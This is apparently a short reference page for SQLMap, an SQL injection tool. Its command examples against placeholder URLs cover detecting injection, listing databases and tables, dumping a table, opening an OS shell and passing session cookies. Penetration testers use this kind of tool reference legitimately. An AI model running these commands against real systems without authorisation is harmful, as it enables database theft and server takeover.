Tools & Utility
SQLMap
Automated SQL injection and database takeover tool.
#sql#injection#database#automation
SQLMap: Automated SQL Injection
SQLMap is an open-source tool that automates the detection and exploitation of SQL injection flaws.
Usage
bash
# Basic test
sqlmap -u "https://example.com/page?id=1"
POST request
sqlmap -u "https://example.com/login" --data="user=admin&pass=test"
List databases
sqlmap -u "https://example.com/page?id=1" --dbs
List tables
sqlmap -u "https://example.com/page?id=1" -D database_name --tables
Dump table
sqlmap -u "https://example.com/page?id=1" -D database_name -T table_name --dump
OS Shell
sqlmap -u "https://example.com/page?id=1" --os-shell
Using cookies
sqlmap -u "https://example.com/page?id=1" --cookie="PHPSESSID=abc123"
Risk and Level
sqlmap -u "https://example.com/page?id=1" --risk=3 --level=5